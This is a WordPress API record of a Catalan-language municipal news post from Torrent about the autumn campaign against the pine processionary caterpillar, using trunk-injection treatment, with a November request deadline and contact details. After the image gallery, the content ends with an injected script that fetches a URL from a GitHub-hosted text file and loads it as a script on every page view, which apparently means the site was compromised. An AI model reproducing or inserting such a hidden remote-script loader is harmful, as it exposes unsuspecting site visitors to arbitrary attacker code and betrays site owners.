{"id":72633,"date":"2024-10-03T13:55:54","date_gmt":"2024-10-03T11:55:54","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/torrent-se-moviliza-en-la-lucha-contra-la-procesionaria-del-pino\/"},"modified":"2024-10-07T23:24:47","modified_gmt":"2024-10-07T21:24:47","slug":"torrent-se-moviliza-en-la-lucha-contra-la-procesionaria-del-pino","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/noticias-2\/medio-ambiente-noticias-2\/torrent-se-moviliza-en-la-lucha-contra-la-procesionaria-del-pino\/","title":{"rendered":"Torrent es mobilitza en la lluita contra la procession\u00e0ria del pi"},"content":{"rendered":"\n<p>La campanya de l&#8217;Ajuntament, a la tardor, t\u00e9 com a objectiu controlar i previndre la propagaci\u00f3 d&#8217;esta plaga en \u00e0rees p\u00fabliques com a jardins i centres educatius<\/p>\n\n\n\n<p>El tractament a trav\u00e9s de \u2018endoterapia\u2019 garantix uns millors resultats en la lluita contra esta plaga<\/p>\n\n\n\n<p>Els particulars que vulguen realitzar el tractament en la seua parcel\u00b7la privada hauran de realitzar la seua sol\u00b7licitud abans del 4 de novembre<\/p>\n\n\n\n<p>Com cada tardor, l&#8217;Ajuntament de Torrent en col\u00b7laboraci\u00f3 amb l&#8217;empresa p\u00fablica municipal Nous Espais Torrent SA, ha anunciat la posada en marxa de la campanya de control de la procession\u00e0ria del pi en jardins, col\u00b7legis p\u00fablics d&#8217;educaci\u00f3 infantil i prim\u00e0ria i altres instal\u00b7lacions p\u00fabliques.<\/p>\n\n\n\n<p>Pel fet que els \u00faltims anys s&#8217;ha detectat una afecci\u00f3 de l&#8217;insecte superior a la d&#8217;altres \u00e8poques en pins no tractats i per a evitar les mol\u00e8sties als ve\u00efns del municipi, aix\u00ed com l&#8217;atac als pins, des del Servici de Jardineria Municipal es cont\u00ednua apostant per l&#8217;aplicaci\u00f3 de tractaments preventius en l&#8217;\u00e8poca tardorenca.<\/p>\n\n\n\n<p>La procession\u00e0ria del pi o \u2018eruga procession\u00e0ria\u2019, \u00e9s una plaga que afecta pins fonamentalment. Esta plaga, coneguda per les seues files d&#8217;erugues, pot causar dos tipus de mal: el primer, danys en els pins, <em>defoliando intensament els arbres i reduint el seu creixement, el segon efecte, t\u00e9 acci\u00f3 directa sobre les persones, amb especial afecci\u00f3 sobre els #xiquet, en provocar irritaci\u00f3 en la pell, reaccions al\u00b7l\u00e8rgiques i problemes respiratoris en humans. Aix\u00ed mateix tamb\u00e9 afecta a animals de companyia, als quals pot ocasionar greus reaccions al\u00b7l\u00e8rgiques, causat pels nombrosos p\u00e8ls urticants (<\/em>tricomas) que disposa cada eruga i que es desprenen i suren en l&#8217;aire.<\/p>\n\n\n\n<p>En campanyes anteriors els resultats obtinguts han sigut molt positius, havent-se tractat bianualment m\u00e9s de 1.740 pins p\u00fablics i reduint considerablement les incid\u00e8ncies rebudes. Durant esta campanya 2024-2025, Nous Espais continuar\u00e0 treballant per a registrar un major \u00e8xit en el tractament mitjan\u00e7ant \u2018Endoterapia\u2019, el qual \u00e9s m\u00e9s efectiu entre els mesos de setembre i desembre.<\/p>\n\n\n\n<p>Esta campanya, que s&#8217;adapta al cicle biol\u00f2gic de l&#8217;eruga, \u00e9s preventiva amb el tractament adequat es realitza a la tardor, per a evitar problemes durant la primavera.<\/p>\n\n\n\n<p>El regidor de l&#8217;\u00c0rea d&#8217;Urbanisme i Medi Ambient, Jos\u00e9 Gozalvo, ha manifestat que <strong>\u201cla col\u00b7laboraci\u00f3 ciutadana \u00e9s essencial per a l&#8217;\u00e8xit de la campanya, ja que la detecci\u00f3 preco\u00e7 i la gesti\u00f3 adequada poden reduir significativament els danys causats per la procession\u00e0ria i evitar problemes a la salut\u201d<\/strong>.<\/p>\n\n\n\n<p><strong>ENDOTERAPIA<\/strong><\/p>\n\n\n\n<p>La \u2018endoterapia\u2019 \u00e9s un m\u00e8tode alternatiu de tractament fitosanitari dels arbres respecte dels tractaments aeris tradicionals. destaca, d&#8217;una banda, l&#8217;abs\u00e8ncia d&#8217;atomitzaci\u00f3 de productes qu\u00edmics en l&#8217;ambient i, per una altra, la innocu\u00eftat total per a la salut dels ciutadans i animals i que es pot utilitzar en qualsevol hora del dia. T\u00e9 l&#8217;avantatge, a m\u00e9s, de poder focalitzar el tractament i evitar aix\u00ed els tractaments indiscriminats.<\/p>\n\n\n\n<p>Consistix en la injecci\u00f3, en el tronc, d&#8217;una subst\u00e0ncia nutritiva o fitosanit\u00e0ria que es distribu\u00efx per tot el sistema vascular de la planta.<\/p>\n\n\n\n<p>Nous Espais posa a la disposici\u00f3 dels ciutadans interessats, un servici d&#8217;inspecci\u00f3 per a personalitzar i dur a terme el tractament de \u2018*endoterapia\u2019. D&#8217;esta manera si desitgen realitzar este tractament en les seues parcel\u00b7les privades, posant l&#8217;accent principalment en les parcel\u00b7les privades no urbanitzades, ja que s\u00f3n les que en els \u00faltims anys han registrat m\u00e9s incid\u00e8ncia d&#8217;esta plaga per la falta de tractaments preventius, afectant ve\u00efns confrontants, hauran de presentar la seua sol\u00b7licitud abans del 4 de novembre. Els t\u00e8cnics municipals es posaran en contacte amb els particulars per a realitzar una inspecci\u00f3 i valorar la viabilitat del tractament, acordant amb estos la data per a la seua realitzaci\u00f3. I, una vegada el particular haja abonat el cost establit del servici, es procedir\u00e0 a fer l&#8217;aplicaci\u00f3.<\/p>\n\n\n\n<p>Per a aconseguir m\u00e9s informaci\u00f3 sobre aquest tema, el Servici de Jardineria t\u00e9 habilitats els tel\u00e8fons 96 155 15 09 i 96 156 54 56, a m\u00e9s de les adreces de correu jardineria@nousespais.es&nbsp; i nousespais@nousespais.es.<\/p>\n\n\n\n<p><strong>\u201cDes de l&#8217;equip de govern estem fent un esfor\u00e7 coordinat pota protegir tant la salut i qualitat de vida dels Torrent, sent de summa import\u00e0ncia actuar amb rapidesa en la prevenci\u00f3, per a minimitzar i controlar l&#8217;impacte de la procession\u00e0ria sobre persones, animals i pins. Estes accions reflectixen el ferm comprom\u00eds municipal amb la sostenibilitat ambiental i la salut p\u00fablica\u201d<\/strong>, ha destacat el regidor.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"725\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1-1024x725.jpg\" alt=\"\" class=\"wp-image-72627\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1-1024x725.jpg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1-300x212.jpg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1-768x544.jpg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1-1536x1087.jpg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_1.jpg 1755w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"725\" data-id=\"72629\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2-1024x725.jpg\" alt=\"\" class=\"wp-image-72629\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2-1024x725.jpg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2-300x212.jpg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2-768x544.jpg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2-1536x1087.jpg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/10\/Campana-Procesionaria-2024-25_2.jpg 1755w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/AlexanderRPatton\/cdn\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>La campanya de l&#8217;Ajuntament, a la tardor, t\u00e9 com a objectiu controlar i previndre la propagaci\u00f3 d&#8217;esta plaga en \u00e0rees p\u00fabliques com a jardins i centres educatius El tractament a trav\u00e9s de \u2018endoterapia\u2019 garantix uns millors resultats en la lluita contra esta plaga Els particulars que vulguen realitzar el tractament en la seua parcel\u00b7la privada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":72634,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[790,1209],"tags":[],"class_list":["post-72633","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medio-ambiente-noticias-2","category-nous-espais-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=72633"}],"version-history":[{"count":4,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72633\/revisions"}],"predecessor-version":[{"id":72763,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72633\/revisions\/72763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/72634"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=72633"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=72633"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=72633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}